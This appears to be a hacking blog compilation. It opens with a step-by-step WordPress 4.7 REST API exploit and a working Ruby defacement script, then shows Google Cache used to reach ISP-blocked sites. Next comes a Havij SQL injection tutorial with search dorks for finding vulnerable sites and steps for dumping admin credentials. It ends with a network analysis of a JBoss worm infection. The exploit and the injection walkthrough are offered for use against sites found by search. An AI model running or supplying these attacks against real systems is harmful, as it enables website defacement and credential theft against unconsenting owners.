WordPress REST API Exploit Step by Step

Vulnerability                     Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability could allow a malicious attacker to modify the content of his post or page on a WP site.

Patched Version              : 4.7.2

Additional Info                     : REST API was added in WP 4.4 released on Dec 2015, however you need plugins to activate API. Later in WP 4.7 version, no plugins are needed, it comes enabled by default. This vulnerability is specific to REST API, hence 4.7.0 and 4.7.1 are directly affected by this vulnerability as API is enabled by default.

 

In this demonstration, we are showing you the exact steps to exploit WordPress websites running vulnerable version 4.7 and 4.7.1. And the tool that I am using here is Advanced Rest Client Chrome add-on.

 

STEP 1: Find OUT Website Running Wordpress

Google is your door, search for something similar to this and I got on hands plenty of WP websites.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.

 

STEP 2: Find VULNERABLE WordPress

View page source of the website to identify the running WP Version. If the version is either 4.7 or 4.7.1, then the website is vulnerable and you can proceed further.

 

STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You need to find out using REST API Client. Here 3 is the post ID of the page shown in STEP 1.

 

STEP 4: Execute Now

You should mention your post ID in the api link. here I mentioned my Post ID 3 as ?id=3ABC

And we got the website hacked!

 

Alternately  you can use following exploit Code 

require ‘rest-client’
require ‘json’
puts “Enter Target URI (With wp directory)”
targeturi = gets.chomp
puts “Enter Post ID”
postid = gets.chomp.to_i
response = RestClient.post(
“#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}”,
{
“id” => “#{postid}justrawdata”,
“title” => “You have been hacked”,
“content” => “Hacked please update your wordpress version”
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts “Done! ‘#{targeturi}/index.php?p=#{postid}'”
else
puts “This site is not Vulnerable”
end

source: exploit-db

Easy way to access blocked websites

You must be familiar with Google Cache.  If not, a two line description can explain it well.

Google takes snapshot of each page it scans and caches that version in their server. This cached website (Google Cache) is used by Google to decide if the website is relevant to your search query.

So if a website is blocked by your ISP due to some local law enforcement, you can still access these blocked websites using Google Cache option. Lets look at it.

In the country where I am currently living, piratesbay-torrents are blocked.

website blocked

Inorder to access such blocked websites, all you need to do is instead of directly browsing to thepiratebay.sx, choose ‘Cached’ option in the drop down menu in the Google Search.

 

Google Cache

 

So with the help of Google Cache, I am now able to view the contents of the Pirate Bay, though it is blocked by ISP.

Google Cache Website

Alternate method is using Google Cache tool. One most easy tool is – cache.nevkontakte.com. Actually they are providing you results from Google Cache only.

Enjoy accessing blocked websites!

How to hack using Havij

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. But now it is most commonly used by hackers community as said in an interesting article Cybercrime’s Love Affair With Havij Spells SQL Injection Trouble in dark reading by Ericka
“So when I sat and read chat logs from Anonymous IRC rooms where they do hacker training, the only thing I ever see mentioned is Havij,” Shaul says. “The reason for that is Havij is awesome. And it’s as powerful and easy to use as could be.”
The amazing thing with this tool is that you just need to click buttons to let the tool work for you and no other programming stuff is required. Cool one…right!
Note: I have executed Havij in my own lab of vulnerable website. I take no responsibility for whatever you do using this tutorial
Preparation:
  • Download Free edition from Havij (In the same page, you can see the difference between free and professional edition). It is matter of what your target is.
  • Now you google with below options to find websites  vulnerable for targetting SQL Injection with Havij

inurl:index.php?id=
inurl:article.php?id=

Once you choose a website, type ‘ at the end like shown below and press enter. If you get an error, then the website is vulnerable to SQL Injection.

http://www.hackandsecure/site/content.php?vn=3&id=77′

1. Retrieve DB Information:
Copy and paste the target url in ‘Target’ column and click ‘Analyze’
Once Havij is successful in retrieving DB name, it will stop and you can see the database details either at the log window or ‘Info’ option. Havij will retrieve Web Server Type (Apache, IIS or other), DB Type (My SQL, MS SQL or other) and DB Name
Once this is successful, you can make sure that you are in right path i.e; your target is vulnerable to SQL Injection Attack.
2. Retrieve Tables:
Now you need to retrieve all table that contains user name and password to login to the website. Choose the db and Click ‘Get Tables’ option.
Here you go, now all the tables are retrieved from DB. You can either wait till it retrieves all the tables or you can just stop the top when you see any suspected table like one below. I stopped the processing when Havij found a table that I suspected to be containing user names and passwords for the website.
3. Retrieve Table Columns:
Before you start retrieving data of a specific table, you need to get the columns. So mark the suspected password table and click ‘Get Columns’ 
I am really sorry for marking all website specific details with red mark, I must do that to safeguard.
4. Retrieve User name and Password:
You are at final stage of hacking . Mark the database, table and columns to be retrieved and you have option of retrieving only one row. Choose ‘Get Data’  to let Havij give you member access to the site.
I am done now, luckily my target website didn’t store passwords encrypted and I have their website’s admin password. That’s it!
If the password is encrypted, Havij has inbuilt MD5 option where you can specify the MD5 hash to be cracked.  Havij will look for hash in several sites in mul thread mode and displays the result.
If you need additional information, download PDF Manual from ITSecTeam

JBoss Worm Perl.Bossworm Infection

Let me provide you some of the my network analysis and IPS reports, soon after I found that my test JBoss Server has been infected by Perl.Bossworm.

Perl.Bossworm is a malignant worm that exploits the JBoss Enterprise Application Platform Multiple Vulnerabilities (BID 39710) in order to copy itself to unpatched JBOSS servers. When Perl.Bossworm sets up to a vulnerable server, it finds and infects more vulnerable servers. Perl.Bossworm connects to predetermined domains for downloading and installing other malware threats. Remove Perl.Bossworm before it harms your PC system.

How to find out JBoss Worm Infection on your network :-

Perl.Bossworm symptoms on JBoss Server is discussed and very well explained  in JBoss Community. Where as, below are the symptoms on the network side from my lab:

Symptom 1:

  • the connectivity  between Network Switch and Firewall would be very unstable. I had frequent disconnections – request timeout even when I ping the Inside interface of Firewall from the Switch Telnet console. So obviously, you will have either slow Internet connection or no connectivity at all.
Telnet to your Network Switch and ping to Inside LAN interface of Firewall to check the response (PING) status.
Symptom 2:
  • Network Switch utilization has gone up and reached 99% 🙁
Commands to execute and verify on Network Switch:
1. sh proc cpu sorted (Cisco Switch Command)
You could see that my switch utilization has gone very high within 5 seconds statistics
2. show platform cpu packet statistics  (Cisco Switch Command)
Port GI 7/9 on Network Switch is where JBoss Server was connected, finally found to be transmitting huge number of packets in few seconds

Firewall and IPS (Intrusion Prevention System) Worm Infection Report:-

The IPS reports shown below will clarify the doubts of what has really caused to utilize so high CPU of Network Switch and Firwall disconnectivity

  • The next day after worm infection,  it has established nearly 17000 irc-base sessions to Outside Internet.

  • 342 GB of Bandwidth has been utilized on day 2 of infection
  • Finallywe have the IRC IPs to which infected JBoss server was communicating
Solution to remove JBoss Worm: